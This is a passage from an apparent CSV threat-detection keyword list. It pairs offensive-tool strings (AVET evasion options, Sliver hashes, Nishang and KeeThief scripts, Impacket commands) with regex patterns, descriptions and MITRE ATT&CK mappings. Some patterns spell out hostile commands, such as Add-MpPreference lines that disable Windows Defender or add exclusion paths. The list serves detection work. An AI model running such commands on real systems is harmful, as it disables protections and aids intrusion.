For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33279" "*add_evasion fopen_sandbox_evasion*",".{0,1000}add_evasion\sfopen_sandbox_evasion.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33280" "*add_evasion get_bios_info*",".{0,1000}add_evasion\sget_bios_info.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33281" "*add_evasion get_computer_domain *",".{0,1000}add_evasion\sget_computer_domain\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. 
as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33282" "*add_evasion get_cpu_cores *",".{0,1000}add_evasion\sget_cpu_cores\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33283" "*add_evasion get_install_date *",".{0,1000}add_evasion\sget_install_date\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33284" "*add_evasion get_num_processes*",".{0,1000}add_evasion\sget_num_processes.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33285" "*add_evasion get_standard_browser *",".{0,1000}add_evasion\sget_standard_browser\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33286" "*add_evasion get_tickcount*",".{0,1000}add_evasion\sget_tickcount.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33287" "*add_evasion gethostbyname_sandbox_evasion*",".{0,1000}add_evasion\sgethostbyname_sandbox_evasion.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33288" "*add_evasion has_background_wp*",".{0,1000}add_evasion\shas_background_wp.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33289" "*add_evasion has_folder *",".{0,1000}add_evasion\shas_folder\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33290" "*add_evasion has_network_drive*",".{0,1000}add_evasion\shas_network_drive.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33291" "*add_evasion has_public_desktop*",".{0,1000}add_evasion\shas_public_desktop.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33292" "*add_evasion has_recent_files*",".{0,1000}add_evasion\shas_recent_files.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33293" "*add_evasion has_recycle_bin*",".{0,1000}add_evasion\shas_recycle_bin.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33294" "*add_evasion has_username *",".{0,1000}add_evasion\shas_username\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33295" "*add_evasion has_vm_mac*",".{0,1000}add_evasion\shas_vm_mac.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33296" "*add_evasion has_vm_regkey*",".{0,1000}add_evasion\shas_vm_regkey.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33297" "*add_evasion hide_console*",".{0,1000}add_evasion\shide_console.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33298" "*add_evasion interaction_getchar*",".{0,1000}add_evasion\sinteraction_getchar.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33299" "*add_evasion interaction_system_pause*",".{0,1000}add_evasion\sinteraction_system_pause.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33300" "*add_evasion is_debugger_present*",".{0,1000}add_evasion\sis_debugger_present.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33301" "*add_evasion sleep_by_ping *",".{0,1000}add_evasion\ssleep_by_ping\s.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. 
have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","33302" "*add_malicious_pager*",".{0,1000}add_malicious_pager.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","33303" "*add_malicious_pre_commit*",".{0,1000}add_malicious_pre_commit.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","33304" "*Add_Privilege /Process:* /Privilege:*",".{0,1000}Add_Privilege\s\/Process\:.{0,1000}\s\/Privilege\:.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","33305" "*add_random_newlines(obfuscated_code*",".{0,1000}add_random_newlines\(obfuscated_code.{0,1000}","offensive_tool_keyword","ASPJinjaObfuscator","Heavily obfuscated ASP web shell generation tool.","T1100 - T1027","TA0003 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/fin3ss3g0d/ASPJinjaObfuscator","1","0","N/A","N/A","8","2","160","21","2024-04-26T01:27:42Z","2024-04-23T01:01:53Z","33306" "*add0626b999fe41981a9f6fbf0e5ee1bc51e4677397e8b8c69cc7a2d36571a4c*",".{0,1000}add0626b999fe41981a9f6fbf0e5ee1bc51e4677397e8b8c69cc7a2d36571a4c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33307" "*adda6c0cbcc22357d88157922fafad38cc732fd71fa1389181dc1b31c7f6428e*",".{0,1000}adda6c0cbcc22357d88157922fafad38cc732fd71fa1389181dc1b31c7f6428e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33313" "*addc2b1c765eb8512c2fc911e2f7dca94a51a88048ae3e2ef51b74fe955e61bc*",".{0,1000}addc2b1c765eb8512c2fc911e2f7dca94a51a88048ae3e2ef51b74fe955e61bc.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#filehash","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","33320" "*addcomputer.py -computer-name * -computer-pass * -dc-host * -domain-netbios *",".{0,1000}addcomputer\.py\s\-computer\-name\s.{0,1000}\s\-computer\-pass\s.{0,1000}\s\-dc\-host\s.{0,1000}\s\-domain\-netbios\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33321" "*addcomputer.py -delete -computer-name * -dc-host * -domain-netbios 
*",".{0,1000}addcomputer\.py\s\-delete\s\-computer\-name\s.{0,1000}\s\-dc\-host\s.{0,1000}\s\-domain\-netbios\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33322" "*addcomputer.py*",".{0,1000}addcomputer\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","33323" "*Add-ConstrainedDelegationBackdoor*",".{0,1000}Add\-ConstrainedDelegationBackdoor.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","33324" "*--add-data rarreg.key*",".{0,1000}\-\-add\-data\srarreg\.key.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","33325" "*Add-Exfiltration.ps1*",".{0,1000}Add\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","33327" "*Add-Exfiltration.ps1*",".{0,1000}Add\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33328" "*Adding GlobaLeaks PGP key to trusted APT keys*",".{0,1000}Adding\sGlobaLeaks\sPGP\skey\sto\strusted\sAPT\skeys.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 
- TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","N/A","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","33329" "*Add-KeePassConfigTrigger *",".{0,1000}Add\-KeePassConfigTrigger\s.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","33330" "*Add-KeePassConfigTrigger*",".{0,1000}Add\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","33331" "*AddKeePassTrigger.ps1*",".{0,1000}AddKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","Keepass exploitations from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","33332" "*AddKeePassTrigger.ps1*",".{0,1000}AddKeePassTrigger\.ps1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","33333" "*Add-KeeThiefLurker *",".{0,1000}Add\-KeeThiefLurker\s.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","N/A","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","33334" "*Add-KeyCredentials -target *",".{0,1000}Add\-KeyCredentials\s\-target\s.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","33335" "*Add-Member -MemberType NoteProperty 
-Name Ping -Value (Test-Connection -ComputerName * -Quiet -Count 1) -Force*",".{0,1000}Add\-Member\s\-MemberType\sNoteProperty\s\-Name\sPing\s\-Value\s\(Test\-Connection\s\-ComputerName\s.{0,1000}\s\-Quiet\s\-Count\s1\)\s\-Force.{0,1000}","offensive_tool_keyword","Psnmap","Powershell scanner (nmap like)","T1086 - T1046 - T1059","TA0007","N/A","Black Basta","Discovery","https://github.com/KurtDeGreeff/PlayPowershell/blob/master/PSnmap.ps1","1","0","N/A","N/A","7","2","178","64","2024-08-23T18:24:20Z","2015-01-24T10:46:41Z","33336" "*AddMenuItemA(""Grab browser Passwords""*",".{0,1000}AddMenuItemA\(\""Grab\sbrowser\sPasswords\"".{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#content","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","33337" "*AddMenuItemA(""Pentest""*",".{0,1000}AddMenuItemA\(\""Pentest\"".{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","#content","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","33338" "*Add-MpPreference -DisableBehaviorMonitoring True*",".{0,1000}Add\-MpPreference\s\-DisableBehaviorMonitoring\sTrue.{0,1000}","offensive_tool_keyword","powershell","Windows defender disable protection","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33339" 
"*Add-MpPreference -DisableBehaviourMonitoring True*",".{0,1000}Add\-MpPreference\s\-DisableBehaviourMonitoring\sTrue.{0,1000}","offensive_tool_keyword","powershell","Windows defender disable protection","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33340" "*Add-MpPreference -DisDisableRealtimeMonitoring True*",".{0,1000}Add\-MpPreference\s\-DisDisableRealtimeMonitoring\sTrue.{0,1000}","offensive_tool_keyword","powershell","Windows defender disable protection","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33341" "*Add-MpPreference -ExclusionPath *",".{0,1000}Add\-MpPreference\s\-ExclusionPath\s.{0,1000}","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1105 - T1203 - T1221 - T1027 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","33342" "*Add-MpPreference -ExclustionPath c:\users\public*",".{0,1000}Add\-MpPreference\s\-ExclustionPath\sc\:\\users\\public.{0,1000}","offensive_tool_keyword","powershell","Windows Defender evasion add an exclusion directory for your shady stuff","T1112 - T1562.001 - T1086 - T1548.002 - T1059.001","N/A","N/A","N/A","Defense Evasion","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","33346" "*Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder*CN=System' -PrincipalSamAccountName * -Rights 
